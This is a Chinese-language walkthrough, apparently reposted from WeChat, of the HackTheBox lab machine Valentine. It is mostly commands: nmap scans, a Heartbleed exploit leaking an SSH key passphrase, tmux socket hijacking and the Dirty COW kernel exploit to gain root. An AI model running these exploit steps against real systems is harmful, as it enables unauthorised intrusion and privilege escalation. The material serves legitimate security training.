Valentine
https://app.hackthebox.com/machines/127
受害者ip:10.10.10.79
攻击者ip:10.10.16.4
参考:https://0xdf.gitlab.io/2018/07/28/htb-valentine.html
https://segmentfault.com/a/1190000041117332
端口扫描,开放22,80,443
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.79 | grep ^[0-9] | cut -d '/' -f 1 | tr 'n' ',' | sed s/,$//) nmap -p$ports -sC -sV 10.10.10.79
80端口一张图
目录扫描
http和https的内容是一样的
dev目录是hype的id_rsa
将16进制转换成ASCII字符串
https://www.unit-conversion.info/texttools/hexadecimal/#data
http://10.10.10.79/dev/notes.txt
encode和decode存在xss
encode就是把输入的加密成base64decode就是base64解密输入的内容
发现这里需要id_rsa的秘密
使用nmap的漏洞集合插进扫描发现存在心脏滴血漏洞
nmap --script=vuln -sV -Pn 10.10.10.79 -p 443
使用nmap的ssl-heartbleed证实
nmap --script ssl-heartbleed -p 443 10.10.10.79
找到利用脚本
searchsploit heartbleed
漏洞利用。可以看到有一段base64密文
python2 32764.py 10.10.10.79 -p 443
nRibGVlZGJlbGlld mV0aGVoeXBlCg==
解密后是heartbleedbelievethehype
no mutual signature supported误通常与 SSH 签名算法的兼容性有关
方法1
ssh -i id_rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa -o HostKeyAlgorithms=+ssh-rsa [email protected]
方法二:
使用旧版 SSH 配置
有就修改,没有就创建
~/.ssh/config
Host 10.10.10.79 PubkeyAcceptedAlgorithms +ssh-rsa HostKeyAlgorithms +ssh-rsa
提权1 tmux提权
使用history查看历史命令
tmux -S /.devs/dev_sess
直接获得root权限
tmux -S /.devs/dev_sess
提权2 脏牛提权
uname -a发现内核版本较低
Dirty COW 漏洞(CVE-2016-5195)影响的 Linux 内核版本范围是 2.6.22 到 4.8.3(以及更早未修复的 LTS 内核版本)。内核3.2.0-23-generic 是在漏洞的影响范围内
下载提权脚本
searchsploit dirty
cp /usr/share/exploitdb/exploits/linux/local/40839.c /var/www/html
输入密码后切换用户firefart获得root权限
gcc -pthread 40839.c -o exp -lcrypt
chmod +x exp
./exp
原文始发于微信公众号(王之暴龙战神):Valentine
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论